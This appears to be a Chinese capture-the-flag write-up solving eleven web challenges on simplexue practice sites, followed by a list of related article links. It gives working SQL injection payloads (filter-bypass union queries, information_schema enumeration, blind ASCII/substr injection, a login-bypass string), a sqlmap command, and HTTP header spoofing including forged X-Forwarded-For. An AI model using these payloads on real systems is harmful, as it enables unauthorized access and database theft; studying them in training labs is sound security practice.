1.菊花

http://ctf1.simplexue.com/web/6/

提示:

Please make sure you have installed .net framework 9.9!

用burp拦截,修改user-agent为Mozilla/5.0 (MSIE 9.0;.NET CLR 9.9),下面的注入均在这个条件下进行
id=1 提示hacker:welcome to simplexue CTF
id=4提示hacker: don’t try again

id=0/**/ununionion/**/seselectlect/**/1,user(),database()
用户名和数据库名称:root@cuit-092a2b258a      inject

<span style="font-size:14px;">id=0/**/ununionion/**/seselectlect/**/1,username,userpapassss/**/ffromrom/**/aadmindmin/**/limit/**/0,1--</span>

simplexue: flag is SimCTF{xuectf}

2.Forbidden

http://ctf1.simplexue.com/basic/header/

提示:

You don't have permission to access /on this server.

Make sure you are in HongKong

用burp拦截,修改为Accept-Language:zh-hk即可>KEY:123JustUserAGent

3.头有点大

http://ctf1.simplexue.com/web/1/index.asp?id=1

提示:

You don't have permission to access / on this server.

Make sure you are in the region of England and browsing this site with Internet Explorer

用burp拦截

修改user-agent为Mozilla/5.0 (MSIE 9.0;.NET CLR 9.9)

Accept-Language:en-gb

The key is:HTTpH34der

4.请输入密码

http://ctf1.simplexue.com/basic/js/index.asp

用burp拦截

得到JAVAscript

<script type="text/javascript">
    document.οncοntextmenu=function(){return false};

var a,b,c,d,e,f,g;
    a = 3.14;
    b = a * 2;
    c = a + b;
    d = c / b + a;
    e = c - d * b + a;
    f = e + d /c -b * a;
    g = f * e - d + c * b + a;
    a = g * g;
    a = Math.floor(a);

function check(){
        if(document.getElementById("txt").value==a){
            return true;
        }else{
            alert("密码错误");
            return false;
        }
    }
</script>

写C算出:

#include<stdio.h>
int main()
{
    float a,b,c,d,e,f,g;
    a = 3.14;
    b = a * 2;
    c = a + b;
    d = c / b + a;
    e = c - d * b + a;
    f = e + d /c -b * a;
    g = f * e - d + c * b + a;
    a = g * g;
    printf("%f",a);
    return 0;
}

运算结果:424178.562500   输入:424178  弹出key=>  @#$JSisagoodtool@#$

5.这个看起来有点简单

http://ctf5.simplexue.com/8/index.php?id=1

id=1'

id=1 and 1=1

id=1 and 1=2                          判断是sql注入

id=1 order by 2                       两个字节

id=1 union select 1,2               回显2

version():                                5.0.45-community-nt

database():                             my_db

user():                                    phpsql@localhost

爆数据库:

and 1=2 union select 1,schema_name  from information_schema.schemata limit 0,1

information_schema     my_db

爆表:

and 1=2 union select 1,table_name from information_schema.tables where table_schema=0x6d795f6462 limit 0,1

news           thiskey

爆字段:

and 1=2 union select 1,column_name from information_schema.columns where table_schema=0x6d795f6462 limit 0,1

id        content           k0y

爆内容:

and 1=2 union select 1,k0y from thiskey

key=>           whati0MyD9ldump

6.猫抓老鼠

http://ctf1.simplexue.com/basic/catch/

查看http发现  Content-Row:    MTQ0ODU0MzEyNA==    填入  MTQ0ODU0MzEyNA==         =>KEY: #WWWnsf0cus_NET#

7.程序员的问题

http://ctf1.simplexue.com/web/4/index.php

查看源代码:

<?phpif($_POST[user] && $_POST[pass]) {$conn = mysql_connect("*******", "****", "****");mysql_select_db("****") or die("Could not select database");if ($conn->connect_error) {die("Connection failed: " . mysql_error($conn));
}
$user = $_POST[user];
$pass = md5($_POST[pass]);$sql = "select user from php where (user='$user') and (pw='$pass')";
$query = mysql_query($sql);
if (!$query) {printf("Error: %s\n", mysql_error($conn));exit();
}
$row = mysql_fetch_array($query, MYSQL_ASSOC);
//echo $row["pw"];if($row['user']=="admin") {echo "<p>Logged in! Key: *********** </p>";}if($row['user'] != "admin") {echo("<p>You are not admin!</p>");}
}?>

输入admin  提示   You are not admin!  于是想到闭合:  输入=>   ')or 1=1#    得到 Key: WWW_SIMPLEXUE_COM

8.what a fuck!这是什么鬼东西?

http://ctf5.simplexue.com/DUTCTF/1.html

有点晕,想到js加密,于是copy下来加上<script> </script> 弹出  Ihatejs

9.貌似有点难

http://ctf8.simplexue.com/phpaudit/

<?php
function GetIP(){
if(!empty($_SERVER["HTTP_CLIENT_IP"]))
    $cip = $_SERVER["HTTP_CLIENT_IP"];
else if(!empty($_SERVER["HTTP_X_FORWARDED_FOR"]))
    $cip = $_SERVER["HTTP_X_FORWARDED_FOR"];
else if(!empty($_SERVER["REMOTE_ADDR"]))
    $cip = $_SERVER["REMOTE_ADDR"];
else
    $cip = "0.0.0.0";
return $cip;
}

$GetIPs = GetIP();
if ($GetIPs=="1.1.1.1"){
echo "Great! Key is *********";
}
else{
echo "错误!你的IP不在访问列表之内!";
}
?>
http协议:

用burp拦截   加入   X-Forwarded-For: 1.1.1.1     伪造IP为:   1.1.1.1            => Key is http_client

10.进来就给你想要的

http://ctf1.simplexue.com/web/1/index.asp?id=1

这题是找后台:

输入admin  查看源代码提示 =>呵呵,思路是对的哈,但是不在这儿。想想谁的权利最大

输入system     =>KEY: "!!!WellDoneBrother!"

11.看起来有点难

http://ctf1.simplexue.com/basic/inject/

这题是盲注题

输入用户名:admin,密码随意,然后提交

提示:登录失败,错误的用户名和密码

然后这么玩:

http://ctf1.simplexue.com/basic/inject/index.php?admin=admin'and (ascii(substr(database(),1,1))=97) %23&pass=admin&action=login

注:

ascii(str):把字符串转换为ascii码;substr(str,star,length)/substring(str,star,length):截取字符串(str字符串,star启始位置,length长度)

得到数据库:test

然后替换dabases();得到所有数据

注:这题过滤了select,用selselectect替换

用sqlmap这么来:

sqlmap.py -u "http://ctf1.simplexue.com/basic/inject/index.php?admin=admin&pass=admin&action=login" --data "admin=&pass="  -D test --table

WEB CTF 西普学院相关推荐

  1. 西普学院逆向writeup ---------你会吗??

    西普学院逆向writeup ---------你会吗?? --------跳跳龙 明天我们学校就要ctf比赛,深夜前10几分钟正好解了一道逆向题,是西普学院的,昨天,在小强的提醒下,也解了一道,今天就 ...

  2. 常熟理工php实验三_西普学院(实验吧)Web题解

    1.你能跨过去吗? Key Words:XSS 根据提示考察XSS,看给出的链接需要的是编解码 http://www.test.com/NodeMore.jsp?id=672613&page= ...

  3. 西普学院web题总结

    一.XSS 1.你能跨过去吗 题目已经明确提示是XSS,给了一个url:http://www.test.com/NodeMore.jsp?id=672613&page=2&pageCo ...

  4. 西普学院Crypto之先有鸡还是先有蛋

    密文:Ijm,lo 3wsdr4 6tghu7 起初看到这个密文那是百思不得其解啊....各种解密都试了 什么栅栏凯撒组合啊... 后来想起有一篇writeup....于是默默的看了下键盘,果然是这样 ...

  5. 西普学院 writeup 逆向工程 该题不简单

    ----------跳跳龙 逆向的话主要就是IDA和OD的混合使用.两者各有优势,不过这道题用IDA就够了,而且OD的话貌似还调试不了,貌似加了保护. IDA逆向的结果如下:IDA对windowsAP ...

  6. 西普学院Crypto之摩擦摩擦

    密文:.-- . .-.. -.-. --- -- . - --- -..- .. .--. ..- -..- ..- . -.-- ..- .- -. 一看就是Morse加密嘛,直接用JPK秒杀 结 ...

  7. 【西普实验吧】求解!

    求解!分值:10 来源: 西普学院难度:易参与人数:3497人Get Flag:251人答题人数:286人解题通过率:88% 密文xztiofwhf是用仿射函数y=5x+11加密得到的 解题链接: 通 ...

  8. 西普教育:发挥高校示范引领作用 助力新工科建设

    贵阳2018年7月23日电 /美通社/ -- 2018年7月23日,由西普教育承办的"新工科·新教育·新生态"高峰论坛在贵阳召开.2017-2018年,西普教育共计申报教育部产学合 ...

  9. 既往出现中性粒细胞减少的患者可以重新应用依那西普

    原文 译文 Clin Rheumatol. 2011 Aug 5. [Epub ahead of print] Re-challenge with Etanercept in patients wit ...

最新文章

  1. java中什么是空指针异常_java中空指针异常的问题,是怎么回事?请看代码
  2. Apache软件历史版本下载地址
  3. 图灵访谈系列之八:对话归隐的大师——Donald E. Knuth(高德纳)
  4. JavaBean的get、set方法生成器
  5. JAVA错误:无法从静态上下文中引用非静态变量 this
  6. Linux(3)--防火墙
  7. 奥南朵 | 21天提升幸福感正念冥想
  8. ibatis mysql 配置文件详解_MyBatis配置文件详解
  9. UITextView(文本视图) 学习之初体验
  10. 软件工程-可行性分析
  11. 大势至监控服务器共享文件系统,大势至局域网共享文件监控NAS文件设置的方法...
  12. Python 基于sympy模块求极值 导数 偏导
  13. 【锐捷】DHCP配置
  14. Intent中putExtra()方法用法
  15. 房贷又降,不买!还能降
  16. 在android中在屏幕密度为160,在 android 中,在屏幕密度为160时,1pt 大概等于多少sp...
  17. 计算机睡眠之后无法唤醒,电脑进入睡眠状态后无法唤醒一直黑屏,该如何处理...
  18. 键盘是计算机最常用的输入设备之一
  19. 微分算子法 求微分方程特解 (超简单)
  20. python获取邮件并转为pdf

热门文章

  1. Anaconda创建、激活、退出、删除环境及管理环境中的包相关命令——最新全面直观版
  2. python列表是可变对象吗_Python可变对象和不可变对象
  3. jmeter并发测试简介
  4. 1836 永真公式的验证
  5. 服务器配置(未启用)修改,配置没有启动服务器服务怎么办
  6. 华为平板可以安装python_10 个可以在平板电脑上使用的 Python 编辑器
  7. 利用RVM与FastDeploy实现高效视频绿幕抠像:挽救视频剪辑师的工作效率
  8. 关于不同版本aee db文件的抓取
  9. 深度学习2.1二分类(Binary Classification)
  10. AI语音技能云开发(天猫精灵技能)学习笔记(结营)